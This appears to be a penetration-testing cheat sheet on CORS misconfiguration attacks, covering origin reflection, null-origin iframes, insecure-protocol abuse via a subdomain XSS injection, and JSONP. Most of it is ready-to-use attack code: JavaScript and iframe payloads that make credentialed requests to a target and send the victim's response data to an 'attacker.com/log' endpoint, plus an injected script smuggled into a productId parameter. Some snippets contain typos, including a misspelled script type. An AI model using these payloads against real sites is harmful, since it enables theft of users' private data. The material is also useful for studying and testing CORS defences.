CORS (Cross-Origin Resource Sharing) Attack

CORS is a mechanism that allows restricted resources on a web page to be requested from another domain outside the domain from which the first resource was served. The CORS Attack is the attacking methodology that abuses this mechanism.

Origin Reflection

1. Change Origin Value of Request Header

Origin: https://attacker.com
Origin: https://vulnerable.com.attacker.com

2. Check if the Response Allowing Cross-Origin

It's reflected the previous reqeust in the response header, you can exploit it.

Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Origin: https://vulnerable.com.attacker.com
Access-Control-Allow-Credentials: true

3. Exploit with Your Malicious Web Page

For example, it's hosted as "https://attacker.com/exploit" or "https://vulnerable.com.attacker.com/exploit".
Add the JavaScript code in the web page.

It shows the users' sensitive information of the target website in your server's log.

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('GET', 'https://vulnerable.com/details', true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location = '/log?key=' + this.responseText;
    }
</script>


Null origin

1. Send Request with Origin: null

Origin: null

2. Check if the Response Allowing Cross-Origin

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

3. Add the iframe to Your Malicious Web Page

For example, it's hosted as "https://attacker.com/exploit".

<iframe
    sandbox="allow-scripts allow-top-navigation allow-forms"
    srcdoc="<script>
        var req = new XMLHttpRequest();
        req.onload = reqListener;
        req.open('GET', 'https://vulnerable.com/details', true);
        req.withCredentials = true;
        req.send();

        function reqListener() {
            location = 'https://attacker.com/log?key=' + encodeURIComponent(this.responseText);
        }
        </script>"
></iframe>


Insecure Protocol

1. Send Request with Abbused Origin

Origin: http://subdomain.vulnerable.com

2. Check if the Response Allowing Cross-Origin

Access-Control-Allow-Origin: http://subdomain.vulnerable.com
Access-Control-Allow-Credentials: true

3. Add the JavaScript Code to Your Malicious Web Page

It's hosted as "https://attacker.com/exploit"

<script>
    document.location="http://subdomain.vulnerable.com/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://vulnerable.com/details',true); req.withCredentials = true;req.send();function reqListener() {location='https://attacker.com/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>


JSONP (Json with Padding)

<script>
    var userinfo = function (data) {
        alert(JSON.stringify(data));
    }
</script>
<script src="https://vulnerable.com/example.php?value=userinfo" type="text/javascriipt"></script>